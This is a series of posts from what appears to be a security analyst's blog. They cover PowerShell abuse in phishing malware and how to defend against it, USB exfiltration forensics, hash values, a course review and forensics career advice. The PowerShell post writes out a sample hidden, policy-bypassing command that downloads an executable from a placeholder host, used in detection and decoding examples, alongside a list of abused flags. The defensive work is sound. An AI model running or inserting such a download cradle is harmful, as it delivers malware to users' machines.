PowerShell: Tool for Admins and Adversaries

Readers!

Over the last couple of weeks I have been analysing malware, mostly delivered via phishing attempts. What our adversaries are doing is first gaining easy access to the machine via phishing, then creating background processes that call out to compromised domains and download an executable packed with a malicious payload. Below is a basic timeline of a phishing email with an attachment.

timeline

The technique is neither new nor unique; however, looking at the trend, most of these attacks use similar tools and procedures. One such tool is PowerShell. This blog is not about what PowerShell is, but about how our adversaries are abusing a tool that was created simply to automate admin tasks within the Windows environment. As automation was one of its key goals, PowerShell was given a scripting capability, which allows admins to automate tasks such as configuration management. And there I go, explaining what PowerShell is anyway.

Microsoft certainly did not intend the tool to be used maliciously, and to this date one can use PowerShell to perform malicious activities. However, certain controls and functionality within PowerShell can assist us in controlling the type of scripts that can run on our systems.

There are indeed multiple security controls, which we will discuss later in the blog, but first let's see what our adversaries are doing. I will not go into the specific analysis of a malware sample, as I am trying to reach the teams responsible for detecting/preventing these types of attacks by placing feasible and actionable security controls around PowerShell.

Below is a sample PowerShell command seen in most cases:

ps-command

Frequently used parameters:

  1. ExecutionPolicy Bypass – Execution policies in PowerShell determine whether scripts can run and what type of scripts can run, and set the default policy. Microsoft added a flag called 'Bypass' which, when used, bypasses the currently assigned execution policy and runs the script without any warnings. There are four main execution policies:
    1. Restricted
    2. Unrestricted
    3. AllSigned
    4. RemoteSigned
  2. WindowStyle Hidden – Used when a PowerShell script needs to run in the background without the user's knowledge.
  3. NoProfile – A PowerShell profile is a set of commands (it is actually itself a PowerShell script), normally for the current user and host, that runs at launch. Setting -NoProfile launches the script without loading any profiles.
  4. DownloadFile – A WebClient method used to download a file over the web.
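
Detection teams can key on combinations of these parameters appearing in a single command line. Below is a minimal sketch in Python (the flag list and the scoring are my own illustration, not a production rule):

```python
import re

# Parameters frequently abused together, as listed above.
SUSPICIOUS = [
    "-executionpolicy bypass",
    "-windowstyle hidden",
    "-noprofile",
    "downloadfile",
]

def suspicion_score(command_line: str) -> int:
    """Count how many of the abused parameters appear in the command line."""
    # Collapse repeated whitespace so multi-space evasion still matches.
    normalised = re.sub(r"\s+", " ", command_line.lower())
    return sum(1 for flag in SUSPICIOUS if flag in normalised)

cmd = ("powershell -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile "
       "(New-Object Net.WebClient).DownloadFile('http://bad.example/a.exe','a.exe')")
print(suspicion_score(cmd))  # → 4
```

A score of three or more on a workstation that does not normally run PowerShell is worth an alert.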

Tools, Techniques and Procedures:

  1. The attachments, as shown in the first screenshot, are mostly Word/Excel documents with macros, or zip files containing JavaScript.
  2. The macros or JS are obfuscated, sometimes heavily and sometimes lightly. For heavily obfuscated scripts I rely on dynamic analysis (the best way to know what the malware was written for). Some scripts, with practice, I can deobfuscate within minutes.
  3. The PowerShell commands mostly download files from sites over HTTP rather than HTTPS (though some sophisticated adversaries have created/compromised HTTPS websites). I have also sometimes noticed cmd.exe /c being used, which invokes the specified command and then terminates.
  4. The file on the compromised domain is mostly a Windows executable with an '.exe' extension, or sometimes the extension is hidden. This depends on the adversary and the packer they have used. Sometimes you can unpack the 'exe' via 7zip.
  5. Based on the command, the file is first downloaded and then executed. In certain cases I have seen the file get deleted after execution; again, it depends on the command.
  6. Most malware that I have analysed was either ransomware, or trying to steal information, and sometimes a combination of both.
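
On the obfuscation point: one common outer layer is the -EncodedCommand parameter, which is just Base64 over UTF-16LE text. A quick triage sketch (the payload and URL here are placeholders, not from a real sample):

```python
import base64

def decode_encoded_command(b64_blob: str) -> str:
    """Decode a PowerShell -EncodedCommand blob (Base64 over UTF-16LE)."""
    return base64.b64decode(b64_blob).decode("utf-16-le")

# Build a sample the way a dropper would (placeholder payload),
# then decode it back, as an analyst would during triage.
payload = "(New-Object Net.WebClient).DownloadFile('http://bad.example/a.exe','a.exe')"
blob = base64.b64encode(payload.encode("utf-16-le")).decode("ascii")
print(decode_encoded_command(blob))
```

Inner layers (string concatenation, character substitution, etc.) still need manual or dynamic analysis, but this gets you a readable starting point.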

The above TTPs are very simple to understand; however, implementing security controls, let's say for each step, to detect and prevent them is much harder. As a team or as individuals we are working towards reducing the impact of an incident. Consider the phases of the cyber kill chain, perform an analysis of incidents within your team, and understand at which phase you are able to catch the adversary, and whether you can do it earlier.

Observables such as IP addresses, domains, URLs and file hashes with context are the IOCs that we normally look for and use for detection and prevention. Some people call that Threat Intelligence. Darwin would have said, "Seriously?"


Security controls such as endpoint solutions, proxies, IDPS and firewalls can help us, but they are heavily dependent on what they already know, and history has shown us that they can be bypassed. However, they are still very good controls for reducing impact and/or preventing known attacks or IOCs.

What we need are security controls based on TTPs. So let's look at some controls that can be implemented to detect and/or prevent such attacks:

  1. DO NOT give admin privileges to the local account. If required by their role, use an admin password generator with User Account Control (UAC) enabled, which will prompt for the Administrator password every time a system change, such as installing a program or running an admin task, is initiated.
  2. Use group policies so that certain tasks, especially script execution and writing to the registry and the Windows directory, are only allowed for Administrators. Administrative Templates can be used for this.
  3. Use group policy to disallow executables being saved to or executed from the TEMP directory.
  4. Sign all PowerShell scripts. If that is not possible, or the team is not willing to sign, the restrictions placed via the above points can assist.
  5. You can also set the execution policy to Restricted, so that PowerShell can only be used interactively and will not run scripts. Organisations that are not pushing any policies via PowerShell can choose this option.
  6. Application whitelisting – Windows AppLocker. The tool can help define what level of access a user has on the system with regards to executables, scripts and DLLs.
  7. Having AppLocker in allow mode, with a rule that only scripts in trusted locations can run on the system, can assist the team. Note that an attacker can rewrite the rule, provided he/she has admin privileges on the system.
  8. PowerShell language mode – an admin can set the language mode to Constrained Language Mode, which permits all Windows cmdlets and all Windows PowerShell language elements but limits the permitted types. It has a list of types that are allowed within a PowerShell script. For example, the New-Object cmdlet can only be used with allowed types, which do not include System.Net.WebClient.
  9. Logging of PowerShell is also important. Here, in my opinion, Sysmon is a must-have; the logs can be forwarded to a SIEM for correlation. If Sysmon is not feasible, enabling PowerShell module logging is highly recommended. Enhanced logging is always recommended, and I will write another blog on that.
  10. Configure the organisation's proxy to detect/prevent web requests invoked via PowerShell. I have tested the Invoke-WebRequest command, which shows WindowsPowerShell within the User-Agent string. However, no User-Agent string is present when the above-mentioned DownloadFile method is used. Proxies could perhaps be configured to disallow any traffic without a User-Agent (I still have to verify whether such functionality exists). If not, a SIEM rule can be used to alert on web traffic with no User-Agent string going to external sites and downloading files.
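
The SIEM idea in point 10 can be sketched as a simple filter over proxy logs. The log format below is hypothetical; map the field names to whatever your proxy actually emits:

```python
import csv
import io

# A hypothetical three-field proxy log; real proxy schemas will differ.
LOG = """client_ip,url,user_agent
10.0.0.5,http://bad.example/payload.exe,
10.0.0.7,https://vendor.example/update,Mozilla/5.0
"""

def requests_without_user_agent(log_text: str) -> list:
    """Return proxy log rows whose User-Agent field is empty."""
    reader = csv.DictReader(io.StringIO(log_text))
    return [row for row in reader if not (row["user_agent"] or "").strip()]

for row in requests_without_user_agent(LOG):
    print(row["client_ip"], row["url"])
```

In a real SIEM you would add the "external destination" and "file download" conditions on top of the missing User-Agent check to cut false positives.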

Please note that AppLocker and PowerShell Constrained Language Mode are not security features on their own but another layer of defence, which can help reduce the impact of an attack and in some cases completely prevent the execution of foreign scripts.

When making a business case to the board or C-level executives for changes in the organisation, the presenter should use language they understand. As part of the evidence, it is highly recommended to show actual incidents where current security controls failed, impacting user productivity, causing loss of data, and costing hours to recover and restore systems. They want to know how any suggested changes will help reduce the impact to the user or the business.

If there are other methods that other organisations are using, please let me know.

A good read – PowerShell for Blue Team

 

Finding Evidence of Data Exfil – USBStor artefacts

Readers!

Last year one of the members of the SANS DFIR list posted a question about identifying whether any data leakage had occurred in the environment via a USB thumb drive. As evidence, the investigator had USBStor artefacts. Shell bag analysis (TZWorks sbag) showed a large number of files touched (reg-UTC) within a very short time period, and a few with the MRU (Most Recently Used) flag set with different times.

This blog is a concise summary of the tips provided by myself and other members. These tips assisted the investigator in supporting the theory of data leakage.

  1. Evaluate USB dates as a group. If a number of artefacts are detected with the exact same timestamp, investigate further: such artefacts indicate that they were somehow modified. It is also worth the effort to carve the data for deleted registry files and look for relevant keys there.
  2. Normal users will often access files again after copying them to removable media, to make sure the files were copied correctly and are not corrupted. This operation leaves shell items in the form of shell bags and link (.lnk) files. One can use the Windows time rule to look for evidence of a file copy. Using the time rule, examine the link files with target data pointing to files on removable media (TZWorks 'lp' is excellent for this). If the modified date of the target file data in the link file precedes the created date of the target file data in the link file, then this is an indication that the file was opened from the removable media after the file was copied to it. This means that even without access to the removable media, you can state that files were copied to the removable media and then opened from it. The created date of the target data in the link file is when the file was copied to the removable media. One can state that the files were copied, but cannot state where the file was copied from, as that is not tracked.
  3. To determine when the file was opened from the removable media, look at the times of the link file itself. The created date of the link file will be the first time the file was opened, and the modified date of the link file will be the last time the file was opened. To discover the removable media, locate the volume serial number of the removable media's file system, which is stored in the link file's data. Correlate the volume serial number to the data from your USB drive analysis and you will get the manufacturer's unique serial number for that removable media. Find that unique serial number across your enterprise and you will discover other machines that drive was connected to. Correlate the link file target data to the shell bag data and you should be able to get a neat timeline of what happened on the system.
  4. Memory analysis of the system can assist. If the files were copied, there should be data on the clipboard. Drag and drop will likely not leave any such artefacts.
  5. Registry hives – one can use FTK Registry Viewer for ease. USBStor keys have last-written values: dates when the device was last accessed or connected.
  6. Look at the recent files in the Windows section. Even if one is not able to open a file, it may show which file came from which volume. It may not prove that the file was copied; however, if the document name is 'organisationconfidential' then you can argue what that file was doing on a USB. The link files should also contain the volume serial, which one can match/compare with removable media serials.
  7. Registry restore points can also be used to check last-written dates.
  8. Look at the MFT records – they have source MFT and destination MFT entries.
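
The time rule from points 2 and 3 boils down to a single comparison. A sketch (field names and dates are illustrative; in practice the timestamps come from a link-file parser such as TZWorks 'lp'):

```python
from datetime import datetime

def copied_to_removable(target_modified: datetime,
                        target_created: datetime) -> bool:
    """Windows time rule: on a file copy, the destination gets a new
    created date but keeps the source's modified date. If the link
    file's target-modified precedes target-created, the file was
    copied to the media and later opened from it."""
    return target_modified < target_created

# Target data carved from a hypothetical .lnk file:
modified = datetime(2016, 3, 1, 9, 15)   # inherited from the source file
created  = datetime(2016, 3, 4, 14, 2)   # stamped when copied to the USB
print(copied_to_removable(modified, created))  # → True
```

Run the same check over every link file whose target points at the removable volume, and you have a candidate list of copied files.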

Tools mentioned: SBE – ShellBags Explorer, and MFTparser

Links mentioned :

https://files.sans.org/summit/Digital_Forensics_and_Incident_Response_Summit_2015/PDFs/PlumbingtheDepthsShellBagsEricZimmerman.pdf

 

Hash Values – A Trivial Artefact

Readers!

Merry Christmas and a Happy New Year to all. The days of holiday spam and vendor predictions are here.

Here I am, spending a summer afternoon watching TV and writing on my blog. As I am a bit lazy during holidays, I am posting something simple. The post is about hash values and how trivial yet useful they are in identifying malicious files/programs.

You can read about Hash here.

Hash values are important first of all for verifying files. Think of a hash as a signature or footprint. Just as living beings have signatures or footprints by which we can recognise them, files have something called a digital footprint by which we can identify them.

Take the example of HashCalc. The following screenshot shows the different hash values of HashCalc.exe.

hashcalc

As you can see, HashCalc provides a lot of information (the digital footprint) about itself. With regards to security, hashes are normally used to verify files, as mentioned earlier. Let's look briefly at the commonly used hash values:

  • MD5 – Based on the Message Digest algorithm. Normally represented as 32 hexadecimal digits. Vulnerable to collision attacks. Read further here.
  • SHA-1 – Secure Hash Algorithm 1. Represented as 40 hexadecimal digits; generates a 160-bit message digest. Vulnerable to collision attacks and being phased out in favour of SHA-2 and SHA-3. Read further here.
  • SHA-256 – Part of the Secure Hash Algorithm 2 family, represented as 64 hexadecimal digits. The SHA-2 family defines six digests – SHA-224, SHA-256, SHA-384, SHA-512, SHA-512/224 and SHA-512/256. Read further here.
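
You can reproduce these digests yourself; for example, in Python:

```python
import hashlib

# Compute the three digests discussed above for the same input bytes.
data = b"abc"
print("MD5    ", hashlib.md5(data).hexdigest())      # 32 hex digits
print("SHA-1  ", hashlib.sha1(data).hexdigest())     # 40 hex digits
print("SHA-256", hashlib.sha256(data).hexdigest())   # 64 hex digits
```

Note how the output lengths (32, 40 and 64 hexadecimal digits) match the descriptions above, and how changing a single input byte produces a completely different footprint.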

Now, why this blog entry? The information is available via Google and Wikipedia. The reason is that hash values, though trivial to compute, are considered important in the Threat Intelligence and cyber security world. Lots of OSINT and vendor intelligence systems share hash values of known malware droppers. These could be executables, MS Office documents, Adobe documents, image files, etc.

The following are a few scenarios where hash values can assist:

  • Hash values can assist in identifying whether a file/program we have is legitimate or not.
  • Malware analysis blogs will almost always provide the hash values of the identified files/programs.
  • Hash values are also used by endpoint solutions to detect known malicious files/programs.
  • During incident response, one can also use hash values in YARA rules to detect malicious files/programs.
  • Organisations can keep a list of hash values of known good and authorised programs, which can then be used to identify unwanted programs on a system, either via the endpoint for real-time detection and/or during incident response. Benchmarking/baselining is a complicated process, though, and sometimes not feasible in large organisations.
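
The last scenario can be sketched as a simple set lookup (the allowlist entry below is just the SHA-256 of the demo bytes, not a real baseline):

```python
import hashlib
import tempfile
from pathlib import Path

# Hypothetical allowlist of SHA-256 values for authorised programs;
# a real one would come from a maintained baseline.
KNOWN_GOOD = {
    "ba7816bf8f01cfea414140de5dae2223b00361a396177a9cb410ff61f20015ad",
}

def is_authorised(path: Path) -> bool:
    """Hash the file and check the digest against the known-good set."""
    return hashlib.sha256(path.read_bytes()).hexdigest() in KNOWN_GOOD

# Demo: a file containing b"abc" hashes to the allowlisted value above.
sample = Path(tempfile.mkdtemp()) / "sample.bin"
sample.write_bytes(b"abc")
print(is_authorised(sample))  # → True
```

The hard part in practice is not the lookup but building and maintaining the known-good set, which is the baselining problem mentioned above.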

NIST provides a list of known good hash values of legitimate programs, which one can use to compare good vs bad. Read here.

Hash values are just another indicator, but one that gives more targeted detection of malicious files/programs. IP addresses and URLs are dynamic, not 100% reliable, and carry a lower confidence level as threat indicators; this is why hash values are considered an important artefact in the security world.

Happy Holidays!

 

SANS FOR578 Cyber Threat Intelligence – Course Review

Readers!!!

Advance greetings for Christmas. Before I start, make sure to check out the SANS Holiday Hack Challenge here.

Recently, I was honoured to attend one of the SANS courses, FOR578 – Cyber Threat Intelligence. The instructor was one of the best in the business, Robert M. Lee. My reason for attending SANS training is purely that they are one of the best security training providers, and when they announced FOR578 last year I was very keen to see SANS' take on threat intelligence. I have been self-learning about threat intelligence via Lockheed Martin and various webcasts from SANS and other providers, and realised that every vendor has a different approach to threat intelligence.

I had prior knowledge of threat intelligence, and this course helped me get the best out of it.

By the end of the first day, I had a very good understanding of what intelligence is and how it is associated with cyber threats. Most of the time, in the name of threat intelligence, vendors or service providers end up sharing threat indicators with some nice dashboards and portray the system as a threat intelligence system. I have always said we need to move beyond indicator-based systems (yes, it is still good to have those) and concentrate more on the tools, techniques and procedures of our adversaries. The content of the course aligned with my thinking, helped me refine it, and showed how to actually implement it in real life.

During the course, I learned how to track a threat actor or a campaign and how best to showcase that information across your organisation. Tools such as CRITs, MISP and threat_note were used. The Kill Chain model and the Diamond Model were explained in detail, and the labs were designed to implement these models.

One of the interesting labs was reviewing a vendor threat intelligence report. The report could be regarding an APT, an analysis of a threat actor, or generic briefings from across the globe related to cyber threats. In this exercise we learned about biases, and how multiple inputs to one single report may change the actual outcome of the report or the identification of the adversary.

Other labs covered extracting intelligence from vendor reports, tracking a campaign, which artefacts to collect during an intelligence exercise, and how to provide evidence for your hypotheses. There were also labs concentrating on how to share threat information via STIX, YARA and OpenIOC. The course also includes very good real-life case studies.

By the end of the fifth day, I knew what actual threat intelligence means and how we can use it in our organisation.

For those thinking of taking the course, I would highly recommend it.

Evoltin POS Malware – Kill Chain Mind Map

Readers!!!

It has been quite a while since I updated my blog, due to spending some quality time off work with family.

Recently, I was honoured to attend the SANS FOR578 Cyber Threat Intelligence course taught by Robert M. Lee, and it was excellent. I will write a separate blog post reviewing the course later.

Working in a customer service environment, I have realised how important data visualisations are. When you are presenting your findings to C-level executives, having tables, charts and graphics in the report makes it easier to grasp the analyst's (or whoever wrote the report) point of view. We can visualise our findings about organisational risks, threats, incidents and many other departmental attributes in different ways.

For me, the best visualisation is mind maps, and I have used them to represent processes, procedures, incidents, etc. I also use mind maps when performing investigations during IR, forensics and/or threat hunting. They help me track my investigation steps and findings. If the incident continues into the next business day, the mind map helps me start where I left off, and also helps me trace back my steps, rather than digging through spreadsheets, other textual representations, or a case management system.

During the course, there was a good stress on making sure investigation or intelligence-gathering information is represented in a manner that all levels of audience can understand. This is when I thought of creating a mind map of a malware sample's behaviour and how it can be represented across the Kill Chain phases.

evoltin-pos-aka-nitloveposb

The above screenshot shows the Kill Chain phases for the Evoltin POS malware, the indicators identified during analysis, and how they can be associated with the different Kill Chain phases. Rather than presenting them in table or chart format, I believe the mind map view is much easier to grasp and better presented.

I will be creating more mind maps and uploading them to my GitHub account. I normally upload IOCs to AlienVault OTX, Blueliv, GitHub and ThreatConnect, but now I will also create a similar Kill Chain mind map for every investigation I do.

Happy Mind Mapping!!!!!

Forensics – Where to start and What to know

Readers

I would like to share my experience and understanding with regards to forensics, and how I got my foothold in the field.

Questions that I normally get: I want to get into forensics. What should I study? What kind of certificates are good? What background should I have?

In this blog I will answer those questions based on my experience. I will not dwell on explaining what forensics is and why we perform it; for that you can just google it and/or read my blog entry – Incident Response and Forensics: The Two Towers. Understand that forensics is considered a specialised field, meaning one must have prior knowledge of fundamentals in operating systems, networking, packet analysis, incident handling, etc.

For me, it started in technical support – first because I was a student, and second because technical support staff work through numerous issues and fixes throughout the day, which can extend into forensic investigation. For example, a user calls in saying "my system is working slowly" – a tech support person will first investigate why, then provide a solution/workaround based on the findings. This helped me understand system internals, especially Windows. One must understand how an operating system works – its processes, services, kernel-level attributes, etc. A very good link to start is here for Windows, here for Mac OS X and here for Linux. I will be creating a mind map for this and will provide it on my GitHub account.

Certificates such as SANS GCFE will give you insights into Windows operating system forensics. Individuals thinking of this course should read on here.

Other courses and a comparison can be viewed here.

We obviously need tools to perform forensics. There are numerous tools available, depending on what is required. SANS has its own Linux distribution, SIFT, and further information can be found here.

There is also a debate that system admins make the best forensic examiners or investigators, and I don't agree with that statement. Yes, system admins have knowledge of the system, but mostly around hardening and fixing issues; the security aspect is rarely covered on the sysadmin side. A system admin will still need to learn and/or go through training (self-paced or class-based) and understand how their experience overlaps with forensics.

To gain more knowledge about networking, incident handling and packet analysis, I moved into a SOC (security operations centre). This allowed me to understand how an operating system communicates with other operating systems, the network and/or external systems. In the SOC, I was responsible for identifying anomalies and developing SIEM content to identify incidents within the network and/or operating system based on known bad behaviour. This also taught me what good behaviour looks like. All operating systems log events, and one must understand what those events mean, in what situations they are triggered, and how one can use them to identify unauthorised activity and/or unusual behaviour. This knowledge later allowed me to investigate an operating system and/or infected host in a different manner. Yes, forensics and incident response overlap; they are two sides of the same coin. I always took initiative, and that helped me in the field.

To understand how forensics should be performed, one must also understand the standards and RFCs. Understanding these allowed me to grasp how the corporate world and/or any forensics practice should perform forensics, and how it can be integrated into incident response. Have a read here for the NIST publication, here for the RFC, and here for the NIST mobile forensics publication.

This should be a good start for individuals interested in forensics. One should also dive into the operating system they normally use at work/home on their laptop/desktop and go through the system. For Windows, work with PowerShell, look at the Event Viewer and services, and use the Sysinternals tools. Fire up Wireshark and/or Chrome net-internals to see what happens when you access a website. Note down whatever is considered normal behaviour. For Linux/Mac, look at the logs under /var/log.

Lastly, read forensics and incident response related blogs, which will give you good insight into using the tools, how forensics is performed, and current methodologies and types of investigations.

A few forensics blogs:

Another point I will raise: certifications are not the only way to understand or gain more knowledge in forensics. Regular practice and dedication to self-learning and implementation will help a lot. But in the corporate world these certifications are considered an entry point, and it is advisable to get them. I have done SANS certifications (I am not advocating and/or advertising SANS for personal gain, just sharing my personal experience), and I believe they concentrate on fundamentals and have better content on the topics covered than other certifications.

I will provide more links in the upcoming mind map. I will also share any forensic and/or IR investigations that I perform in my home lab, including tool usage.

Happy Forensicating!!!!!

Disposable email addresses (DEA) and concerns

Readers

This post is about disposable email addresses: where to get them, and the concerns for organisations or whitehats defending their network/country. Disposable email addresses are addresses for which you don't need an account. Understand that you can only RECEIVE emails and cannot SEND. The service was first paid-only, but now you can get it for free from multiple providers. The email address lasts from 10 minutes to a week.

A disposable email address is something you can use to register on a site that you think you won't visit often, that may send you spam later, or where you want to hide your identity. Depending on who is using the service, it can be used in positive and/or negative ways.

Let’s start looking at them:

  1. AirMail
  2. Guerrilla Mail
  3. ThrowAwayMail
  4. Mailinator
  5. Temp Mail
  6. myTemp.email
  7. Email On Deck

There are others, but the ones mentioned are the top hits.

Having a background in social engineering and in identifying tactics that cyber criminals and/or insiders may use, I can think of two concerns with regards to disposable email.

  1. Partners in crime can use these for their communications, without worrying about being tracked and/or revealing the identity of the recipient.
  2. Another concern is insiders, and how one can use disposable emails to transfer data and/or for data exfiltration. Organisations should be on the lookout for these channels and can configure their mail gateway and/or DLP to make sure no sensitive/confidential information is going out.
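
For the mail gateway/DLP idea in point 2, a basic check is a domain lookup against a deny list. The domains below are only a tiny illustrative sample; a real deployment should consume a maintained feed:

```python
# Illustrative, incomplete list of disposable-email domains; real
# deployments should use a maintained feed, not a hard-coded set.
DISPOSABLE_DOMAINS = {
    "mailinator.com",
    "guerrillamail.com",
    "temp-mail.org",
}

def is_disposable(address: str) -> bool:
    """Flag recipients whose domain is a known disposable-email provider."""
    domain = address.rsplit("@", 1)[-1].lower()
    return domain in DISPOSABLE_DOMAINS

print(is_disposable("someone@mailinator.com"))  # → True
print(is_disposable("colleague@example.org"))   # → False
```

The same lookup can run on the mail gateway (block or quarantine outbound mail to these domains) or as a SIEM enrichment on mail logs.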

If you know of other concerns, please comment.

Let's hope the service is being used for good purposes.